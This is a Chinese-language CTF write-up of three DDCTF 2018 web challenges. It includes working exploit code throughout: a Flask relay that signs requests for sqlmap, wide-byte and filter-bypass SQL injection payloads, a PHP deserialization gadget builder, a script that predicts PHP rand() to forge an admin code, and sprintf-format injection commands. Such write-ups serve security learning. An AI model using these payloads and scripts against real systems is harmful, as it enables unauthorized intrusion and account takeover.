DDCTF2018_部分Web_wp

2018-05-01

× 文章目录

1. 0x01 数据库的秘密
2. 0x02 注入的奥妙
3. 0x03 我的博客

只做出了第一题，然后就卡在第二题的Java了。。蛋疼。。
闯关式的比赛。。也挺蛋疼。看不到后面的题目。。
题目开放一年。参考了大佬的writeup，复现了一下其中三题Web。

https://clannad.me/ddctf.md.html
http://sec2hack.com/ctf/ddctf-2018-web-writeup.html

0x01 数据库的秘密

常规sql注入。修改XFF头进入页面，有一个hidden字段author。
正常搜索了几波，发现请求时会带上GET参数sig和time。
查看了下JS代码可知，time是单纯的秒级时间戳，sig是请求内容拼接上变量key之后sha1的哈希值。（key在HTML源码里）

利用flask转发HTTP数据包。

from flask import Flask, request
import requests, time, hashlib
app = Flask(__name__)
@app.route("/",methods=['POST'])
def hello():
    a = request.form.get('author')
    key = "adrefkfweodfsdpiru"
    t = int(time.time())
    sig = hashlib.sha1("id=title=author={}date=time={}".format(a, t) + key).hexdigest()
    urlappend = "sig={}&time={}".format(sig, t)
    r = requests.post('http://116.85.43.88:8080/ZODGIRYTDIETBCSI/dfe3ia/index.php?'+ urlappend, data={'id':'', 'title':'','date':'','author':a,'button':'search'}, headers={'X-Forwarded-For':'123.232.23.245'})
    return r.content
if __name__ =='__main__':
    app.run(host='0.0.0.0', port=8000)

然后就丢sqlmap跑吧，注意这里or和and是被拦了，要用||和&&绕一下，使用--tamper=symboliclogical。

1	sqlmap -r a.txt --level=3 --risk=3 --tamper=symboliclogical

0x02 注入的奥妙

注释中提示了BIG5编码。选了后一个字节为5C的么字，可以宽字节注入。由于<>会被replace成空，并且对关键字的过滤并不是循环过滤。因此可以双写绕过或者在关键字中插入<>。

1	-1么'uni<>on%20select%20id,pattern,action%20from%20route_rules%23

id	pattern	action
1	get*/	u/well/getmessage/
12	get*/	u/justtry/self/
13	post*/	u/justtry/try
15	static/bootstrap/css/backup.css	static/bootstrap/css/backup.zip

访问/static/bootstrap/css/backup.css即可拿到源码。

在/Helper/Test.php的getflag()方法中输出了flag。$this->fl->get($user)可知$this->fl为Helper/Flag.php中Flag类的一个实例。代码审计时可发现在/Controller/JJusttry.php的try($serialize)方法中存在反序列化漏洞。

<?php
// Test.php
class Test
{
    public $user_uuid;
    public $fl;
    public function getflag($m = 'ctfuser', $u = 'default')
    {
        //TODO: check username
        $user=array(
            'name' => $m,
            'id' => $u
        );
        //懒了直接输出给你们了
        echo 'DDCTF{'.$this->fl->get($user).'}';
    }
}
// Flag.php
class Flag
{
    public $sql;
    //
    public function __construct()
    {
        $this->sql=new SQL();
    }
    //
    public function get($user)
    {
        $tmp=$this->sql->FlagGet($user);
        if ($tmp['status']===1) {
            return $this->sql->FlagGet($user)['flag'];
        }
    }
}
// SQL.php
class SQL
{
    public $dbc;
    public $pdo;
}
// Justtry.php
public function try($serialize)
{
    unserialize(urldecode($serialize), ["allowed_classes" => ["Index\Helper\Flag", "Index\Helper\SQL","Index\Helper\Test"]]);
}
?>

通过构造字符串，根据路由规则POST数据到justtry/try，反序列化后可构建一个Test实例。即可输出flag。

<?php
namespace Index\Helper;
class Test {
    public $user_uuid;
    public $fl;
}
class Flag {
    public $sql;
    public function __construct()
    {
        $this->sql=new SQL();
    }
}
class SQL {
    public $dbc;
    public $pdo;
}
$a = new Test();
$a->user_uuid = '79c78cb9-cdc1-4b05-a82c-a93face2ce19';
$a->fl = new Flag();
echo urlencode(serialize($a));
?>

namespace 指定命名空间
在命名空间字符串过长时，使用use可以相应的缩短命名空间。
https://www.cnblogs.com/drunkhero/p/namespace.html

0x03 我的博客

rand()和str_shuffle()的预测。在Linux中，PHP的rand()函数是调用glibc库中的rand函数，是有缺点的，可预测。详情看这里->Cracking PHP rand()。

1	rand[i] = (rand[i-3] + rand[i-31]) & 0x7fffffff

当取的随机数大于31位时，后面的随机数可通过上述式子推出，预测值有时会比实际值少1

由于str_shuffle()依赖 rand() 进行字符串随机操作。因此可通过预测rand()的值来预测出admin的code。而每一次的rand值可以从注册表单的csrf字段中获得。PHP的str_shuffle()可参考 PHP 5.6.35 string.c L5394

import requests
import re
PHP_RAND_MAX = 0x7fffffff
rand_list = []
rand_count = 35
url = "http://116.85.39.110:5032/2096b322e99ffc1a59891b972c0fa612/register.php"
s = requests.session()
def get_rand_list():
    for _ in range(rand_count):
        c = s.get(url)
        rand_list.append(int(re.findall('id="csrf" value="(\d+)"',c.text)[0]))
def php_rand():
    global rand_count
    xrand = (rand_list[rand_count - 3] + rand_list[rand_count - 31]) & PHP_RAND_MAX
    rand_list.append(xrand)
    rand_count += 1
    return xrand
# https://github.com/Sjord/crack-ezchatter-token/blob/master/crackseed.c
def php_rand_range(n, nmin, nmax, tmax):
    return int(nmin + (nmax - nmin + 1.0) * (n / (tmax + 1.0)))
def php_str_shuffle(s):
    n_left = len(s)
    s = list(s)
    if n_left <= 1:
        return
    n_left -= 1
    while n_left > 0:
        rnd_idx = php_rand();
        rnd_idx = php_rand_range(rnd_idx, 0, n_left, PHP_RAND_MAX);
        if rnd_idx != n_left:
            s[n_left], s[rnd_idx] = s[rnd_idx], s[n_left];
        n_left -= 1
    return ''.join(s)
if __name__ == "__main__":
    get_rand_list()
    csrf = rand_list[rand_count-1]
    code = "admin###" + php_str_shuffle('0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ')[:32]
    username = code[8:13]
    data = {
        'csrf':csrf, 
        'username':username, 
        'password':'123',
        'code': code
    }
    con = s.post(url, data=data)
    print(con.text)
    print('---------------------')
    print('username: ' + username + '\npassword: 123')
    print('code: ' + code)

运行脚本后可得到注册后admin身份的帐号密码。登录后，在index.php的源码中可发现存在sprintf注入漏洞。对于php中sprintf格式化字符串漏洞可见 https://paper.seebug.org/386/

简单的说就是sprintf中%1$\'会将\吃掉，导致'的逃逸。%后表示第几个参数，$表示参数类型。

还有一个sprintf漏洞的利用方式：%c起到了类似chr()的效果，将数字39转化为'，从而导致了sql注入。

<?php
$input1 = '%1$c) OR 1=1 #';
$input2 = 39;
$sql = "SELECT * FROM foo WHERE bar IN ('$input1') AND baz = %s";
$sql = sprintf($sql, $input2);
echo $sql;
?>

在这题中，--prefix加个前缀丢进sqlmap跑就好了。

1	sqlmap -u 'http://116.85.39.110:5032/2096b322e99ffc1a59891b972c0fa612/index.php?id=1&title=a' -p title --cookie="PHPSESSID=65a15a2c6c93df292e2f2666e2aa31c8" --prefix="%1$'"

话说。。看了大佬的writeup才知道sqlmap有前缀--prefix和后缀--suffix这种东西。